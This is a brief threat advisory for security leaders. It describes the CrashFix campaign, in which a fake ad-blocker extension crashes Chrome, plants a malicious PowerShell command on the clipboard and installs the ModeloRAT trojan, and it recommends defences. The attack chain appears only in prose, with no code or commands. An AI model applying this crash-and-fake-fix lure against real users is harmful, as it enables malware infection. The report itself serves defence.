What happened
The CrashFix campaign uses malicious browser extension to deploy ModeloRAT after Huntress analysts identified threat actor KongTuke distributing a deceptive browser extension named NexShield that impersonates the legitimate uBlock Origin Lite ad blocker. The extension was hosted on the official Chrome Web Store and, after a delay, deliberately crashes the user’s browser by triggering resource exhaustion via Chrome runtime port loops. Upon restart, it displays a fake “CrashFix” warning urging users to execute an apparent remedy via the Windows Run dialog. The extension silently copies a malicious PowerShell command to the clipboard, which, if executed, uses a Windows utility to download further payloads. On domain-joined machines, this sequence culminates in deployment of ModeloRAT, a Python-based remote access trojan with encrypted command-and-control. This multi-stage infection leverages social engineering and abuse of legitimate platform features to escalate impact.
Who is affected
Users of Google Chrome who install deceptive extensions are directly exposed, especially corporate users on domain-joined systems where full malware payloads are delivered. Organizations with lax extension policies or unmanaged endpoint controls face elevated risks.
Why CISOs should care
Malicious browser extensions can circumvent traditional network defenses and leverage social engineering to deliver backdoors. When integrated with corporate environments, they provide footholds for broader compromise and persistent access.
3 practical actions
-
Enforce extension allowlists: Restrict browser extension installs to approved listings only.
-
Educate users on extensions: Train users to avoid installing extensions from ads or sponsored links.
-
Monitor execution anomalies: Detect unusual PowerShell activity or abnormal extension behaviors.